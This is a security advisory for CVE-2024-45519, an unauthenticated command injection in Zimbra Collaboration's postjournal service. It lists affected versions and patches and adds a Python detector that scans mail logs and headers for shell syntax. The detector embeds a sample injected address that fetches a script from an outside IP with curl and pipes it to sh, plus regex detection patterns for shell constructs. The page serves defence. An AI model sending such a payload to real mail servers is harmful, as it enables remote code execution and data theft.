PT-2024-6328 · Zimbra · Zimbra Collaboration

Published

2024-09-04

·

Updated

2025-07-30

·

CVE-2024-45519

CVSS v3.1: 10.0 (Critical)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Name of the Vulnerable Software and Affected Versions:

Zimbra Collaboration versions prior to 8.8.15 Patch 46

Zimbra Collaboration versions 9 prior to 9.0.0 Patch 41

Zimbra Collaboration versions 10 prior to 10.0.9

Zimbra Collaboration versions 10.1 prior to 10.1.1

Description:

The postjournal service in Zimbra Collaboration, an optional component that is disabled by default, allows unauthenticated remote attackers to execute arbitrary OS commands on the server when it is enabled. The vulnerability is being actively exploited in the wild: threat actors send emails to vulnerable instances with command payloads embedded in them. Successful exploitation gives the attacker code execution on the mail server and, through it, unauthorized access to the mail system and the data it holds. Over 19,000 Zimbra installations were observed exposed to the Internet at the time of publication.
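The exploitation described above (command payloads carried inside the e-mail itself) is something a defender can hunt for in MTA logs and inbound headers. The following Python detector is an added example, not code from this page, from Zimbra, or from any exploit; it assumes, which the page does not state, that the injected command arrives inside an SMTP address, and the Postfix log lines, the message and the payload it checks are constructed samples rather than captured traffic:

```python
"""Heuristic detector for shell-command syntax carried inside e-mail addresses.

Added example (not code from the page or from Zimbra). Assumption, not stated
on the page: exploitation attempts against postjournal deliver the injected
command inside an SMTP address, so the envelope recipients recorded in Postfix
logs and the From/To/Cc headers of inbound mail are the places to look. The
log lines, the message and the payload below are constructed samples.
"""
import re
from email import message_from_string

# Shell constructs that never belong in a legitimate mailbox local-part.
SHELL_PATTERNS = {
    "command substitution $(...)": re.compile(r"\$\("),
    "backtick substitution": re.compile(r"`"),
    "parameter expansion ${...}": re.compile(r"\$\{"),
    "command separator ; | &": re.compile(r"[;|&]"),
    "base64 decode": re.compile(r"base64\s*(?:-d|--decode)", re.IGNORECASE),
}

# addr-spec: a quoted local-part (anything between the quotes) or a dot-atom,
# followed by @ and a domain.
_ADDR_RE = re.compile(r'("(?:[^"\\]|\\.)*"|[^\s<>,;:"]+)@[A-Za-z0-9.\-]+')

# Postfix logs envelope addresses as from=<...>, to=<...> or orig_to=<...>.
# Stop only at a '>' followed by ", " or end of line, so a '>' redirection
# inside a payload does not truncate the capture.
_LOG_ADDR_RE = re.compile(r"\b(?:from|to|orig_to)=<(.*?)>(?=, |$)")

# Constructed payload in the style of an injected address: a quoted local-part
# wrapping a command substitution; ${IFS} stands in for spaces.
PAYLOAD = '"aabbb$(curl${IFS}http://198.51.100.7/p|sh)"@example.org'

# Constructed Postfix log excerpt (mail.log style); one line carries the payload.
SAMPLE_LOG = (
    "Sep 30 03:12:45 mx1 postfix/qmgr[1102]: 4XJ1k2: from=<alice@example.org>, size=512, nrcpt=2 (queue active)\n"
    "Sep 30 03:12:46 mx1 postfix/smtp[2820]: 4XJ1k2: to=<bob@example.org>, relay=local, delay=0.4, status=sent (250 OK)\n"
    "Sep 30 03:12:46 mx1 postfix/smtp[2820]: 4XJ1k2: to=<" + PAYLOAD + ">, relay=local, delay=0.4, status=sent (250 OK)\n"
    "Sep 30 03:12:50 mx1 postfix/qmgr[1102]: 4XJ1k3: from=<>, size=900, nrcpt=1 (queue active)\n"
)

# Constructed inbound message with the payload smuggled in the Cc header.
SAMPLE_MESSAGE = (
    "From: Mallory <mallory@example.net>\n"
    "To: bob@example.org\n"
    "Cc: " + PAYLOAD + "\n"
    "Subject: invoice\n"
    "\n"
    "hello\n"
)


def suspicious_reasons(address):
    """Names of every shell construct found in one address (empty list = clean)."""
    return [name for name, rx in SHELL_PATTERNS.items() if rx.search(address)]


def addresses_from_log_line(line):
    """Envelope addresses in one Postfix log line (empty <> entries dropped)."""
    return [a for a in _LOG_ADDR_RE.findall(line) if a]


def addresses_from_message(raw):
    """Addresses from the sender/recipient headers of a raw RFC 5322 message."""
    msg = message_from_string(raw)
    found = []
    for hdr in ("From", "To", "Cc", "Bcc", "Reply-To"):
        for value in msg.get_all(hdr, []):
            found.extend(m.group(0) for m in _ADDR_RE.finditer(value))
    return found


def scan(addresses):
    """[(address, [reasons])] for every address that carries shell syntax."""
    hits = []
    for addr in addresses:
        reasons = suspicious_reasons(addr)
        if reasons:
            hits.append((addr, reasons))
    return hits


def scan_log(text):
    """Scan every line of a Postfix log excerpt."""
    hits = []
    for line in text.splitlines():
        hits.extend(scan(addresses_from_log_line(line)))
    return hits


def scan_message(raw):
    """Scan the address headers of one raw message."""
    return scan(addresses_from_message(raw))


if __name__ == "__main__":
    for source, hits in (("log", scan_log(SAMPLE_LOG)), ("message", scan_message(SAMPLE_MESSAGE))):
        for addr, reasons in hits:
            print(f"[{source}] {addr}: {', '.join(reasons)}")
```

Run it as a script to print the hits, or feed `scan_log` an excerpt of the real `/var/log/mail.log`. The patterns are deliberately narrow (actual shell syntax rather than merely unusual characters) to keep false positives low on quoted local-parts that are legal but odd; a hit is a reason to check whether postjournal is enabled and the server is patched, not proof of compromise.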

Recommendations:

For Zimbra Collaboration versions prior to 8.8.15 Patch 46, update to version 8.8.15 Patch 46 or later.

For Zimbra Collaboration versions 9 prior to 9.0.0 Patch 41, update to version 9.0.0 Patch 41 or later.

For Zimbra Collaboration versions 10 prior to 10.0.9, update to version 10.0.9 or later.

For Zimbra Collaboration versions 10.1 prior to 10.1.1, update to version 10.1.1 or later.

Fixed releases are available for every supported branch, so updating is the real fix. As a temporary mitigation on hosts that cannot be updated immediately, disable the postjournal service if it is not in use (it is optional and disabled by default), and make sure the MTA's mynetworks parameter is restricted to trusted networks so that untrusted hosts cannot reach the service.

Exploit

Fix

Weakness Enumeration

OS Command Injection

Related Identifiers

BDU:2024-07279
CVE-2024-45519
ZIMBRA_CVE_2024_45519

Affected Products

Zimbra Collaboration